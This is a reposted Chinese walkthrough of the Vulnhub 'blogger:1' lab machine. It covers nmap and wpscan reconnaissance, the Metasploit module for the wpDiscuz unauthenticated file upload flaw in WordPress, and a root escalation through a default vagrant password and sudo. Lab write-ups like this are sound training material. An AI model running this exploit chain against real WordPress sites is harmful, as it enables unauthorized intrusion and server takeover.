当前位置: 首页 > news >正文

Vulnhub: blogger:1靶机

news 2025/6/24 17:42:45

kali:192.168.111.111

靶机:192.168.111.176

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.176

在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress

利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞

wpscan --url http://blogger.thm/assets/fonts/blog/ -e u,ap --plugins-detection mixed

漏洞利用

msf进行漏洞利用

use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
set targeturi /assets/fonts/blog/
set blogpath /?p=1
set rhosts blogger.thm
run

提权

vagrant用户的密码同样为vagrant

vagrant用户sudo权限

提升为root

sudo su

flag

http://www.lryc.cn/news/108262.html

相关文章:

  • 老版MFC工程迁移到VC2019编译EXE太大的问题
  • Curve深陷安全事件,OKLink如何破局
  • 2023华数杯数学建模思路A题B题C题模型代码分析
  • el-table合并单元格
  • html5设置不缓存
  • kotlin 的函数参数
  • 谈谈 Kafka 的幂等性 Producer
  • Doris(三)-集群部署3个FE+3个BE
  • js沙箱逃逸
  • 振弦传感器信号转换器应用山体滑坡安全监测
  • Moonbeam新增强大的互操作性功能至波卡生态
  • 考研408 | 【计算机网络】概述
  • 一道名题-(csp 儒略日)的心得与技巧
  • 单元测试之- mock工具mockito
  • 03 线程间共享数据
  • 题目:2264.找到一个数字的 K 美丽度
  • 分布式ID性能评测:CosId VS 美团 Leaf
  • MySQL数据库安装(二)
  • 通过MySQL删除Hive元数据信息
  • 在电脑如何翻译文件名称并同时保存原文件名和新文件名称
  • Modbus协议简介与常用测试指令说明
  • EXCEL里数值列如何显示序号?如何重新排序? 怎么取得排序后的序号?
  • kubernetes 集群利用 efk 收集容器日志
  • 安防视频监控汇聚平台EasyCVR在移动端火狐浏览器中云台显示的优化
  • selenium官文文档阅读总结(day 3)
  • 【pandas百炼成钢】数据预览与预处理
  • 怎么查到企业的供应商和客户?
  • 智能物流千人俱乐部---行业必备神器
  • uniapp uview文件上传的文件不是文件流,该如何处理?用了uni.chooseImage预览功能要如何做
  • pktgen-dpdk arm编译问题 “Platform must be built with RTE_FORCE_INTRINSICS“